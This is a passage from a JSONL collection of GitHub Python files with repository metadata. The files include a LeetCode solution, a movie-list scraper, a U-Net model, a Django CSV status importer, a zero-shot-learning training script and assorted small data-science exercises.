数据基本类型-整数、浮点、字符串.py","file_name":"1.3 数据基本类型-整数、浮点、字符串.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"zh","doc_type":"code","stars":41,"dataset":"github-code","pt":"40"} +{"seq_id":"23233361383","text":"from string import ascii_lowercase, ascii_uppercase\nfrom collections import deque, defaultdict\nfrom typing import List\n\n\nclass Solution:\n def shortestPathAllKeys(self, grid: List[str]) -> int:\n def neighbors(r: int, c: int):\n answers = [(r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)]\n answers = [(nr, nc) for (nr, nc) in answers if 0 <= nr < M and 0 <= nc < N]\n\n return answers\n\n M, N = len(grid), len(grid[0])\n keys_done = 0\n for i in range(M):\n for j in range(N):\n cell = grid[i][j]\n if cell == \"@\":\n start_r, start_c = i, j\n elif cell in ascii_lowercase:\n keys_done |= 1 << (ord(cell) - ord(\"a\"))\n\n q = deque([(start_r, start_c, 0, 0)])\n visited = defaultdict(set)\n visited[0].add((start_r, start_c))\n\n while q:\n r, c, keys, dist = q.popleft()\n for nr, nc in neighbors(r, c):\n cell = grid[nr][nc]\n wall = cell == \"#\"\n locked = (cell in ascii_uppercase) and not (\n keys & (1 << (ord(cell) - ord(\"A\")))\n )\n if (nr, nc) in visited[keys] or wall or locked:\n continue\n if cell in ascii_lowercase:\n keys_new = keys | (1 << (ord(cell) - ord(\"a\")))\n if keys_new == keys_done:\n return dist + 1\n\n q.append((nr, nc, keys_new, dist + 1))\n visited[keys_new].add((nr, nc))\n else:\n q.append((nr, nc, keys, dist + 1))\n visited[keys].add((nr, nc))\n\n return -1\n","repo_name":"LeetCube/LeetCube","sub_path":"python/src/code_864.py","file_name":"code_864.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"26201701064","text":"import re\nimport requests\nimport xlwt\n\nurl = \"https://movie.douban.com/top250?qq-pf-to=pcqq.group\"\nhead = {\n\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.51\"\n}\n# 发送请求\nr = requests.get(url,headers=head)\n# 解码\na = r.content.decode(\"utf-8\")\n# print(a)\nb = re.findall(\"
  • (.*?)
  • \",a,re.S)\n# print(b)\n\nlist2 = []\n\nfor i in b:\n list1 = []\n c = re.findall('alt=\"(.*?)\" src=',i,re.S)\n # print(c)\n list1.extend(c)\n d = re.findall('src=\"(.*?)class=\"\">',i,re.S)\n # print(d)\n list1.extend(d)\n list2.append(list1)\nprint(list2)\n# print(list1)\n\n\nf = xlwt.Workbook(encoding='utf8')\nsheet = f.add_sheet('电影介绍链接')\n# 创建一个列表,用来循环插入表头\nlist4 = [\"电影名\", \"超链接\"]\nfor c, d in enumerate(list4):\n sheet.write(0, c, d)\n\n# for m,n in enumerate(list2, 1):\n\nfor i in list2:\n # print(i)\n # i.insert()\n print(i)\n\n\n\n\n# f.save('movie.xls')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# f = xlrd.open_workbook(\"python.xls\")\n# # 复制文件并起名为new_f\n# new_f = copy(f)\n# # 创建一个工作表对象,��于操作整个工作表\n# sheet = new_f.get_sheet(0)\n# sheet.write(100, 0, \"博文你好\")\n# new_f.save(\"python.xls\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"goodeveryone/awsl","sub_path":"pythonproject/bowen2005/爬虫练习/爬取电影海报图片.py","file_name":"爬取电影海报图片.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2744874233","text":"\"\"\"\nAuthor: Kourosh T. Baghaei\nA customized Implementation of U-Net for Image Segmentation Task\nMarch 29, 2020\n\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.python.keras import layers\nfrom tensorflow.python.keras.layers import Input,Activation\nfrom tensorflow.python.keras.models import Model,Sequential\nfrom tensorflow import keras\n\n#\n# Network Structure:\n# Contractive Path: Layer 1 -> Layer 2 -> Layer 3\n# Bottleneck: Layer 4\n# Expanding Path: Layer 5 -> Layer 6 -> Layer 7\n#\n\n\nclass MyUNet(tf.keras.Model):\n def __init__(self, input_shape=(128, 128, 3)):\n super(MyUNet, self).__init__()\n\n inputs = Input(shape=input_shape)\n\n # Layer 1\n self.layer1 = self.build_layer1(inputs) # layer1's output: (None, 170, 170, 64). First dimension, denoted\n # with 'None' represents the batch size.\n\n # Layer 2\n i2 = Input(self.layer1.output.shape[1:])\n self.layer2 = self.build_layer2(i2) # layer2's output: (None, 83, 83, 128)\n\n # Layer 3\n i3 = Input(self.layer2.output.shape[1:])\n self.layer3 = self.build_layer3(i3) # layer3's output: (None, 39, 39, 256)\n\n # Layer 4\n i4 = Input(self.layer3.output.shape[1:])\n self.layer4 = self.build_layer4(i4) # layer4's output: (None, 34, 34, 256)\n\n # Layer 5\n s = self.layer4.output.shape\n self.crop_size = s[1:] # output of layer3 should be cropped in heights and widths to match those of layer4.\n s = s[1:-1] + [s[-1] * 2] # output of layer4 and layer3 are merged before being fed to layer5.\n # This is why the last dimension of the tensor is doubled.\n # layer5 input: (None, 34, 34, 512)\n self.layer5 = self.build_layer5(Input(s)) # layer5's output: (None, 64, 64, 128)\n\n # Layer 6\n s = self.layer5.output.shape\n s = s[1:-1] + [s[-1] * 2] # output of layer 5 and layer 2 are merged together. So, the input of layer 6\n # looks like: (None, 64, 64, 128)\n self.layer6 = self.build_layer6(Input(s)) # layer6's output: (None, 124, 124, 64)\n\n # Layer 7\n s = self.layer6.output.shape\n s = s[1:-1] + [s[-1] * 2] # output of layer 6 and layer 1 are merged together. So, the input of layer 7\n # looks like: (None, 124, 124, 128)\n self.layer7 = self.build_layer7(Input(s)) # layer7's output: (None, 122, 122, 2)\n\n def call(self, inputs):\n o1 = self.layer1(inputs)\n o2 = self.layer2(o1)\n o3 = self.layer3(o2)\n o4 = self.layer4(o3)\n\n # randomly crop o3 tensor in batches\n self.crop_size = o4.shape[1:]\n cropped = tf.map_fn(self.crop_rand, o3)\n # Skip Connection ( concat of layer3 and layer4 )\n i5 = layers.concatenate([cropped, o4])\n o5 = self.layer5(i5)\n\n # randomly crop o2 tensor in batches\n self.crop_size = o5.shape[1:]\n cropped = tf.map_fn(self.crop_rand, o2)\n # Skip Connection ( concat of layer2 and layer5 )\n i6 = layers.concatenate([cropped, o5])\n o6 = self.layer6(i6)\n\n # randomly crop o1 tensor in batches\n self.crop_size = o6.shape[1:]\n cropped = tf.map_fn(self.crop_rand, o1)\n # Skip Connection ( concat of layer1 and layer6 )\n i7 = layers.concatenate([cropped, o6])\n o7 = self.layer7(i7)\n\n return o7\n\n # randomly crop an image\n def crop_rand(self, img):\n return tf.image.random_crop(img, self.crop_size)\n\n def build_layer1(self, inp):\n layer1 = Sequential([\n layers.Conv2D(64, 2),\n layers.LeakyReLU(),\n layers.BatchNormalization(),\n layers.Conv2D(64, 2),\n layers.LeakyReLU(),\n ])(inp)\n print('layer 1', layer1.shape)\n return keras.Model(inp, layer1)\n\n def build_layer2(self, inp):\n layer2 = Sequential([\n layers.MaxPooling2D(),\n layers.BatchNormalization(),\n layers.Dropout(0.3),\n layers.Conv2D(128, 2),\n layers.LeakyReLU(),\n layers.BatchNormalization(),\n layers.Conv2D(128, 2),\n layers.LeakyReLU(),\n ])(inp)\n print('layer 2', layer2.shape)\n return keras.Model(inp, layer2)\n\n def build_layer3(self, inp):\n layer3 = Sequential([\n layers.MaxPooling2D(),\n layers.BatchNormalization(),\n layers.Dropout(0.3),\n layers.Conv2D(256, 2),\n layers.LeakyReLU(),\n layers.BatchNormalization(),\n layers.Conv2D(256, 2),\n layers.LeakyReLU(),\n ])(inp)\n print('layer 3', layer3.shape)\n return keras.Model(inp, layer3)\n\n def build_layer4(self, inp):\n layer4 = Sequential([\n layers.MaxPooling2D(),\n layers.BatchNormalization(),\n layers.Dropout(0.3),\n layers.Conv2D(512, 2),\n layers.LeakyReLU(),\n layers.BatchNormalization(),\n layers.Conv2D(512, 2),\n layers.LeakyReLU(),\n layers.Dropout(0.3),\n layers.Conv2DTranspose(256, 2, 2),\n ])(inp)\n print('layer 4', layer4.shape)\n return keras.Model(inp, layer4)\n\n def build_layer5(self, inp):\n layer5 = Sequential([\n layers.Conv2D(512, 2),\n Activation('relu'),\n layers.Conv2D(256, 2),\n Activation('relu'),\n layers.Conv2DTranspose(128, 2, 2)\n ])(inp)\n print('layer 5 ', layer5.shape)\n return keras.Model(inp, layer5)\n\n def build_layer6(self, inp):\n layer6 = Sequential([\n layers.Conv2D(256, 2),\n Activation('relu'),\n layers.Conv2D(128, 2),\n Activation('relu'),\n layers.Conv2DTranspose(64, 2, 2)\n ])(inp)\n print('layer 6 ', layer6.shape)\n return keras.Model(inp, layer6)\n\n def build_layer7(self, inp):\n layer7 = Sequential([\n layers.Conv2D(256, 2),\n Activation('relu'),\n layers.Conv2D(128, 2),\n Activation('relu'),\n layers.Conv2D(2, 1),\n layers.Softmax()\n ])(inp)\n print('layer 7 ', layer7.shape)\n return keras.Model(inp, layer7)\n\n","repo_name":"kbaghaei/U-Net-TF","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16911326146","text":"from colorama import Fore\nfrom colorama import Style\nimport pandas as pd\nimport numpy as np\nimport time\nglobal filepath\nfile_path = 'C:/Users/rjw3/OneDrive/Desktop/Side_projects' + \\\n '/Perfect_numbers/time_to_check_numbers.xlsx'\n\n\n#check for correct input of (y/n)\ndef check(k):\n switch = {\n 'y': 1,\n 'n': 2,\n }\n return switch.get(k, 3)\n\n#check for correct input of max range\ndef maxrngf():\n while True:\n try:\n maxrng1=int(input('max range: '))\n except ValueError:\n print(Fore.RED + \"Must be a whole number.\")\n print(Style.RESET_ALL)\n else:\n return maxrng1\n\n#push times to excel\ndef push(list_):\n list_ = np.array(list_)\n list_ = pd.DataFrame(list_)\n global file_path\n list_.to_excel(file_path)\n\n#ask user if the default file path is ok\n\nwhile True:\n yn = input('Is the default filepath \\n\"' + str(file_path) + '\"\\nwhere the excel data should be sent? (y/n) : ')\n yn = check(yn)\n if yn == 1:\n break\n if yn == 2:\n file_path = input('Excel filepath for time data to be sent: ')\n break\n if yn == 3:\n print(Fore.RED + 'Error: Wrong input type')\n print(Style.RESET_ALL)\n\n\n\n\n\n# look for perfect numbers\nwhile True:\n maxrng = maxrngf()\n perfectnumb=[]\n searchrng=list(range(1,maxrng))\n times = [None] * (len(searchrng)+1)\n start = time.time()\n for i1 in ((range(0,len(searchrng)))):\n posnumb=int(i1)\n posdiv=[]\n sumposdiv=[]\n for i in range(1,int(((posnumb)/2)+1)):\n if((posnumb)%i==0):\n posdiv.append(i)\n sumposdiv=sum(posdiv)\n if(sumposdiv==posnumb):\n perfectnumb.append(posnumb)\n times[i1] = time.time() - start\n print('\\n')\n print(str(perfectnumb))\n print('\\n')\n del maxrng\n \n# ask if the user would like to push data to \"file_path\"\n while True:\n yn = input('Push to excel (y/n) : ')\n yn = check(yn)\n if yn == 1:\n push(times)\n break\n if yn == 2:\n break\n if yn == 3:\n print(Fore.RED + 'Error: Wrong input type')\n print(Style.RESET_ALL)\n\n# ask if the user would like to try a differnet range \n while True:\n yn = input('Another? (y/n) : ')\n yn = check(yn)\n if yn == 1:\n continuethis = True\n break\n if yn == 2:\n continuethis = False\n break\n if yn == 3:\n print(Fore.RED + 'Error: Wrong input type')\n print(Style.RESET_ALL)\n if continuethis == False:\n break\n \n \n","repo_name":"rjwags72/Perfect-Numbers","sub_path":"pernumbtime_app_source&build/source/perfnumbtime.py","file_name":"perfnumbtime.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19091011709","text":"import sys, csv\nfrom django.core.management.base import BaseCommand\nfrom app.models import Sample\nfrom app.statuses import SampleStatus\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv_file', type=str, help=\"csv file with headers 'well', 'rack', 'barcode', 'call' (or '-' for \"\n \"stdin)\" )\n parser.add_argument('--comment', type=str, default=\"\", help=\"comment to be stored in Event records\", dest='comment')\n\n def handle(self, *args, **options):\n if options['csv_file'] == \"-\":\n fin = sys.stdin\n else:\n fin = open( options['csv_file'], encoding='utf-8-sig' )\n bc_ok = []\n bc_missing = []\n bc_duplicated = []\n wrong_status = []\n status_recorder = {}\n for r in csv.DictReader(fin):\n if r['call'] == '':\n continue\n if r['call'] not in [x.name for x in SampleStatus]:\n print('Unknown status %s set for barcode %s, skipping.' % (r['call'], r['barcode']))\n wrong_status.append( r['barcode'] )\n continue\n sq = Sample.objects.filter(barcode=r['barcode'])\n if len(sq) == 0:\n bc_missing.append( r['barcode'] )\n elif len(sq) > 1:\n bc_duplicated.append( r['barcode'] )\n else:\n s = sq.first()\n s.events.create(\n status=r['call'],\n comment=\"Rack %s, Well %s\\n%s\" % (r['rack'], r['well'], options['comment']))\n status_recorder[r['barcode']] = r['call']\n bc_ok.append( r['barcode'] )\n if options['csv_file'] != \"-\":\n fin.close()\n if len(bc_ok) > 0:\n print(\"THE FOLLOWING STATUS HAVE BEEN SET:\")\n for bc, stat in status_recorder.items():\n print(\"Barcode %s ==> %s:\" % (bc, stat))\n else:\n print(\"Status *not* set for any barcode!\")\n if len(bc_missing) > 0:\n print(\"Status *not* set for following barcodes, which are missing in the database:\")\n print(\" \", \", \".join(bc_missing))\n if len(bc_duplicated) > 0:\n print(\"Status *not* set for following barcodes, which each appear multiple times in the database:\")\n print(\" \", \", \".join(bc_duplicated))\n\n\n\n","repo_name":"anders-biostat/covid-test-web-site","sub_path":"covidtest/app/management/commands/set_status_from_csv.py","file_name":"set_status_from_csv.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70534483641","text":"from pandas import DataFrame as pd\nfrom pandas.core.frame import DataFrame\nimport numpy as np\n\n\n\ndata = {\n \"Jogador\":[\"Victor\",\"Bruno\",\"Cimel\",\"GoldB\"],\n \"Skill\":[8,4,10,9],\n \"HS\":[3.2,1.0,5.0,4.0]\n}\n\nframe = DataFrame(data, columns=['Jogador','Skill','HS','Wins'])\n\n#print(type(frame))\n\nframe['Wins'] = np.arange(4.)\n\nprint(frame)\nprint('////////////////////')\n\nprint(frame.describe())","repo_name":"DevVictorr/Analise-de-Dados","sub_path":"Pandas_Numpy - DataFrames/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42428545025","text":"import argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom utils.DataPrepare_zsl import load_data\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom resnet50 import resnet50,resnet101\n\nimport os\n\nimport pandas as pd\n\nfrom RN import RelationNetwork, AttributeNetwork\nimport scipy.io as sio\nimport numpy as np\n\nfrom tqdm import tqdm\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\ndef train_RN( Attri_nn, RN, cnn_fc, device, train_loader, word_embeddings, optimizer_attr, optimizer_rn, scheduler_attr, scheduler_rn, epoch):\n\n Attri_nn.train()\n RN.train()\n\n Attri_nn.to(device)\n RN.to(device)\n scheduler_attr.step(epoch)\n scheduler_rn.step(epoch)\n\n cnn_fc.train()\n cnn_fc.to(device)\n\n word_embeddings = word_embeddings[:365, :]\n Acc = 0\n for batch_idx, sample in enumerate(train_loader):\n\n data = sample[0].to(device)\n label = sample[1].to(device).squeeze(1)\n\n re_label = []\n for slabel in label.cpu().numpy():\n if slabel not in re_label:\n re_label.append(slabel)\n\n word_embeddings = word_embeddings.to(device)\n optimizer_attr.zero_grad()\n optimizer_rn.zero_grad()\n\n\n word_embeddings2 = word_embeddings[re_label] # select the attribute\n class_num = word_embeddings2.shape[0] # use these labels to train in this batch\n batch_size = data.shape[0]\n data = F.relu(cnn_fc(data))\n cnn_feat = data.unsqueeze(0).repeat(class_num, 1, 1)\n\n semantic_feat = Attri_nn(word_embeddings2).unsqueeze(0).repeat(batch_size, 1, 1)\n cnn_feat = torch.transpose(cnn_feat, 0, 1)\n score = RN(cnn_feat, semantic_feat)\n score = score.view(-1, class_num)\n\n\n\n re_batch_labels = []\n re_label = np.array(re_label)\n for slabel in label.cpu().numpy():\n index = np.argwhere(re_label == slabel)\n re_batch_labels.append(index[0][0])\n re_batch_labels = torch.LongTensor(re_batch_labels)\n\n\n mse = nn.MSELoss().to(device)\n one_hot_labels = torch.zeros(batch_size, class_num).scatter_(1, re_batch_labels.view(-1, 1), 1).to(device)\n loss = mse(score, one_hot_labels)\n loss.backward()\n optimizer_rn.step()\n optimizer_attr.step()\n _, predict_labels = torch.max(score, 1)\n # _, gt_labels = torch.max(one_hot_labels, 1)\n rewards = [1 if predict_labels[j].cpu() == re_batch_labels[j] else 0 for j in range(batch_size)]\n Acc += np.sum(rewards)\n if batch_idx % args.log_interval == 0:\n log_print = 'Train RN Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(train_loader.dataset),\n 100. * batch_idx / len(train_loader), loss.item())\n print(log_print)\n with open(args.log, 'a') as f:\n print(log_print, file=f)\n train_acc = Acc/len(train_loader.dataset)\n print(\"Train Acc is %.3f\"%train_acc)\n\n\n with open(args.log, 'a') as f:\n print(\"Train Acc is %.3f\"%train_acc, file=f)\n\n\ndef test_RN(Attri_nn, RN, cnn_fc, device, test_loader, word_embeddings):\n Attri_nn.eval()\n cnn_fc.eval()\n RN.eval()\n Attri_nn.to(device)\n RN.to(device)\n cnn_fc.to(device)\n total_rewards= 0\n word_embeddings = word_embeddings[365:365+40, :]\n with torch.no_grad():\n for batch_idx, sample in enumerate(test_loader):\n\n data = sample[0].to(device)\n\n label = sample[1].to(device).squeeze(1)\n word_embeddings = word_embeddings.to(device)\n\n re_label = []\n for slabel in label.cpu().numpy():\n if slabel not in re_label:\n re_label.append(slabel)\n\n word_embeddings2 = word_embeddings\n class_num = word_embeddings2.shape[0]\n batch_size = data.shape[0]\n data = F.relu(cnn_fc(data))\n cnn_feat = data.unsqueeze(0).repeat(class_num, 1, 1)\n wd_feat = Attri_nn(word_embeddings2).unsqueeze(0).repeat(batch_size, 1, 1)\n cnn_feat = torch.transpose(cnn_feat, 0, 1)\n scores = RN(cnn_feat, wd_feat).view(-1, class_num)\n\n re_batch_labels = []\n re_label = np.array(re_label)\n for slabel in label.cpu().numpy():\n index = np.argwhere(re_label == slabel)\n re_batch_labels.append(index[0][0])\n _, predict_labels = torch.max(scores, 1)\n\n rewards = [1 if predict_labels[j].cpu() == label[j].long().cpu() else 0 for j in range(batch_size)]\n total_rewards += np.sum(rewards)\n num_test = len(test_loader.dataset)\n test_accuracy = total_rewards/len(test_loader.dataset)\n print(\"Test Acc is %.5f\"%test_accuracy)\n with open(args.log, 'a') as f:\n print(\"the Dem accuracy is %.5f\"%test_accuracy, file=f)\n\n\n\n\n\ndef ZSL_result(cnn_fc, Attr_model, RN_model, device, test_loader, word_embeddings, save_path, classes = None, test_code = None):\n cnn_fc.eval()\n Attr_model.eval()\n RN_model.eval()\n cnn_fc.to(device)\n Attr_model.to(device)\n RN_model.to(device)\n imgpath = pd.read_csv('/home/xd133/zero-shot-gcn/round2_DatasetA_20180927/image.txt', header=None)[0]\n word_embeddings = word_embeddings[-45:, :].to(device)\n\n with torch.no_grad():\n pred_decoder = []\n for batch_idx, sample in tqdm(enumerate(test_loader), total=len(test_loader.dataset)):\n\n data = sample[0].to(device)\n\n batch_size = data.shape[0]\n #cnn_feat = data\n cnn_feat = F.relu(cnn_fc(data))\n\n wd_feat = Attr_model(word_embeddings).unsqueeze(0).repeat(batch_size, 1, 1)\n\n\n cnn_feat = cnn_feat.unsqueeze(0).repeat(45, 1, 1)\n cnn_feat = torch.transpose(cnn_feat, 0, 1)\n scores = RN_model(cnn_feat, wd_feat).view(-1, 45)\n\n _, predict_labels = torch.max(scores, 1)\n\n pred = predict_labels.cpu().numpy()[0]\n tmp = test_code\n\n pred_decoder.append(tmp[pred])\n preds = pd.Series(pred_decoder)\n result = pd.DataFrame([imgpath, preds]).T\n result.to_csv(save_path, sep = '\\t', header=None, index=None)\n\n\n\n\n\n\nif __name__=='__main__':\n parser = argparse.ArgumentParser(description='Pytorch baseline')\n parser.add_argument('--log_interval', type=int, default=10, help='the interval of the display')\n parser.add_argument('--batch_size', type=int, default=128)\n parser.add_argument('--lr', type=float, default=1e-4)\n parser.add_argument('--momentum', type=float, default=0.9)\n parser.add_argument('--wd', type=float, default=1e-5, help='weight_decay')\n parser.add_argument('--epoch', type=int, default=1000, help='the training epoch')\n parser.add_argument('--log', type=str, default='/home/xd133/ZJL_Fusai/log/zsl_log1019_2.txt', help='where to save the log')\n parser.add_argument('--save_path', type=str, default = '/home/xd133/ZJL_Fusai/output/cls_zsl1019.txt', help='path to save the result file')\n parser.add_argument('--test', type = bool, default=False, help='only test?')\n parser.add_argument('--epoch_decay', type=int, default = 30, help = 'decay 0.1 every epoch_decay epoches')\n args = parser.parse_args()\n device = torch.device('cuda')\n\n\n word_embedding = load_data(batch_size=args.batch_size)[0]\n\n word_embedding = torch.from_numpy(word_embedding).float()\n test_code = load_data(batch_size=args.batch_size)[-1]\n\n train_feats = sio.loadmat('/home/xd133/ZJL_Fusai/Features/train.mat')['features']\n train_labels = sio.loadmat('/home/xd133/ZJL_Fusai/Features/train.mat')['label']\n\n val_feats = sio.loadmat('/home/xd133/ZJL_Fusai/Features/val.mat')['features']\n val_labels = sio.loadmat('/home/xd133/ZJL_Fusai/Features/val.mat')['label']\n\n test_feats = sio.loadmat('/home/xd133/ZJL_Fusai/Features/test.mat')['features']\n\n\n train_feats = torch.from_numpy(train_feats)\n train_labels = torch.from_numpy(train_labels)\n\n val_feats = torch.from_numpy(val_feats)\n val_labels = torch.from_numpy(val_labels)\n\n test_feats = torch.from_numpy(test_feats)\n\n train_data = TensorDataset(train_feats, train_labels)\n val_data = TensorDataset(val_feats, val_labels)\n test_data = TensorDataset(test_feats)\n\n\n train_featloader = DataLoader(train_data, batch_size = args.batch_size, shuffle=True)\n val_featloader = DataLoader(val_data, batch_size=1, shuffle=False)\n test_featloader = DataLoader(test_data, batch_size=1, shuffle=False)\n\n\n\n model_Attr = AttributeNetwork(300, 1200, 2048)\n model_RN = RelationNetwork(4096, 1024)\n cnn_fc = nn.Linear(2048, 2048)\n\n optimizer_Attr = optim.Adam(list(model_Attr.parameters()) + list(cnn_fc.parameters()), lr=args.lr, weight_decay=args.wd)\n #optimizer_Attr = optim.Adam(model_Attr.parameters(), lr=args.lr,\n # weight_decay=args.wd)\n scheduler_Attr = optim.lr_scheduler.StepLR(optimizer_Attr, 200)\n optimizer_RN = optim.Adam(model_RN.parameters(), lr=args.lr, weight_decay=args.wd)\n scheduler_RN = optim.lr_scheduler.StepLR(optimizer_RN, 200)\n\n\n\n if args.test == False:\n for epoch in range(1, args.epoch):\n train_RN(model_Attr, model_RN, cnn_fc, device, train_featloader, word_embedding, optimizer_Attr, optimizer_RN,\n scheduler_Attr, scheduler_RN, epoch)\n # train_RN(model_Attr, model_RN, device, train_featloader, word_embedding, optimizer_Attr,\n # optimizer_RN, scheduler_Attr, scheduler_RN, epoch)\n\n\n test_RN(model_Attr, model_RN, cnn_fc, device, val_featloader, word_embedding)\n #test_RN(model_Attr, model_RN, device, val_featloader, word_embedding)\n\n torch.save(model_Attr.state_dict(), \"/home/xd133/ZJL_Fusai/output_zsl1019_2/Attr{:d}.pt\".format(epoch))\n torch.save(model_RN.state_dict(), \"/home/xd133/ZJL_Fusai/output_zsl1019_2/RN{:d}.pt\".format(epoch))\n torch.save(cnn_fc.state_dict(), \"/home/xd133/ZJL_Fusai/output_zsl1019_2/Fc{:d}.pt\".format(epoch))\n\n else:\n model_RN.load_state_dict(torch.load('/home/xd133/ZJL_Fusai/output_zsl1019_2/RN23.pt'))\n model_Attr.load_state_dict(torch.load('/home/xd133/ZJL_Fusai/output_zsl1019_2/Attr23.pt'))\n cnn_fc.load_state_dict(torch.load('/home/xd133/ZJL_Fusai/output_zsl1019_2/Fc23.pt'))\n ZSL_result(cnn_fc, model_Attr, model_RN, device, test_featloader, word_embedding, args.save_path, test_code= test_code)\n\n\n\n\n\n","repo_name":"KaiJin1995/ZSL2018_Zero_Shot_Learning","sub_path":"main_zsl.py","file_name":"main_zsl.py","file_ext":"py","file_size_in_byte":10583,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"1319696029","text":"import random\nimport plotly.express as px\nimport plotly.figure_factory as ff \ncount = []\ndice = []\nfor i in range (0,100):\n dice1 = random.randint(1,6)\n dice2 = random.randint(1,6)\n dice.append(dice1+dice2)\n count.append(i)\ngraph = px.bar(x = dice,y = count)\ngraph2 = ff.create_distplot([dice],[\"dice results\"])\ngraph.show()\ngraph2.show()\nprint(\"done\")","repo_name":"pwaghray-28/distribution","sub_path":"visualization/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71562347959","text":"import pandas as pd\nimport numpy as np\nfrom typing import Generator, Tuple\nfrom functools import lru_cache\nfrom difflib import get_close_matches\nimport logging\n\nclass Iteration:\n\n def get_gene(self, gene: str, include_z:bool = False, \n include_other:list = [], selection:str = None):\n \"\"\"Get the xy(z) coordinates of points of a queried gene.\n \n Takes \"working_selection\" into account (see dataset.Dataset for info).\n This causes the data to get loaded in RAM.\n\n Args:\n gene (str): Name of gene.\n include_z (bool, optional): True if Z coordinate should be \n returned. Defaults to False\n include_other (list, optional): List of other column headers to \n return. Defaults to [].\n selection (str): Name of column to use as boolean selection of\n datapoints. If None, returns all datapoints. Defaults to None.\n\n Returns:\n [pd.DataFrame]: Pandas Dataframe with coordinates.\n \"\"\"\n #Input checking\n #if not gene in self.unique_genes:\n # raise Exception(f'Given gene: \"{gene}\" can not be found in dataset. Did you maybe mean: {get_close_matches(gene, self.unique_genes, cutoff=0.4)}?')\n self.check_gene_input(gene)\n gene_i= self.gene_index[gene]\n \n if isinstance(include_other, str):\n include_other = [include_other]\n\n columns = ['x', 'y']\n if include_z:\n columns.append('z')\n for c in include_other:\n columns.append(c)\n \n #Filter based on input\n if selection != None:\n row_filter = self.df.get_partition(gene_i).loc[:, selection].astype(bool)\n return self.df.get_partition(gene_i).loc[row_filter, columns].compute()\n \n #Filter based on working selection\n elif self._working_selection != None:\n row_filter = self.df.get_partition(gene_i).loc[:, self._working_selection].astype(bool)\n return self.df.get_partition(gene_i).loc[row_filter, columns].compute()\n \n #No selection\n else:\n return self.df.get_partition(gene_i).loc[:, columns].compute()\n\n \n def get_gene_sample(self, gene: str, include_z = False, \n include_other:list = [], frac: float=0.1, \n minimum: int=None, random_state: int=None,\n selection:str = None):\n \"\"\"Get the xyz coordinates of a sample of points of a queried gene.\n \n This causes the data to get loaded in RAM.\n\n Args:\n gene (str): Name of gene.\n include_z (bool, optional): True if Z coordinate should be \n returned. Defaults to False\n include_other (list, optional): List of other column headers to \n return. Defaults to [].\n frac (float, optional): Fraction of the points to load. \n Defaults to 0.1 which is 10% of the data.\n minimum (int, optional): If minimum is given the fraction will be \n adapted to return at least the minimum number of points. if \n there are less points than the minimum it returns all. \n Defaults to None.\n random_state (int, optional): Random state for the sampling to \n return the same points over multiple iterations.\n Defaults to None.\n \n Returns:\n [pd.DataFrame]: Pandas Dataframe with coordinates.\n \"\"\"\n #Input checking\n if not gene in self.unique_genes:\n raise Exception(f'Given gene: \"{gene}\" can not be found in dataset. Did you maybe mean: {get_close_matches(gene, self.unique_genes, cutoff=0.4)}?')\n \n if minimum != None:\n n_points = self.gene_n_points[gene]\n if n_points < minimum:\n frac = 1\n elif frac * n_points < minimum:\n frac = minimum / n_points\n \n \n gene_i= self.gene_index[gene]\n\n \n columns = ['x', 'y']\n if include_z:\n columns.append('z')\n for c in include_other:\n columns.append(c)\n\n #Filter based on input\n if selection != None:\n row_filter = self.df.get_partition(gene_i).loc[:, selection].astype(bool)\n return self.df.get_partition(gene_i).loc[row_filter, columns].sample(frac=frac, random_state=random_state).compute()\n \n #Filter based on working selection\n elif self._working_selection != None:\n row_filter = self.df.get_partition(gene_i).loc[:, self._working_selection].astype(bool)\n return self.df.get_partition(gene_i).loc[row_filter, columns].sample(frac=frac, random_state=random_state).compute()\n \n #No selection\n else:\n return self.df.get_partition(gene_i).loc[:, columns].sample(frac=frac, random_state=random_state).compute()\n \n \n \n \n\n \n \n \n \nclass _old_stuff:\n \n def _group_by(self, by='g'):\n return self.df.groupby(by).apply(lambda g: np.array([g.x, g.y]).T, meta=('float64')).compute()\n \n \n def make_gene_coordinates(self, save_z = False) -> None:\n \"\"\"Make a dictionary with point coordinates for each gene.\n\n Output will be in self.gene_coordinates. Output will be cached so that\n this function can be called many times but the calculation is only\n performed the first time.\n\n \"\"\"\n if self._offset_flag == True:\n \n if save_z:\n self.gene_coordinates = {g: np.column_stack((xy, np.array([self.z_offset]*xy.shape[0]))).astype('float64') for g, xy in self._group_by().to_dict().items()}\n \n else:\n self.gene_coordinates = self._group_by().to_dict()\n \n self._offset_flag = False\n \n else:\n 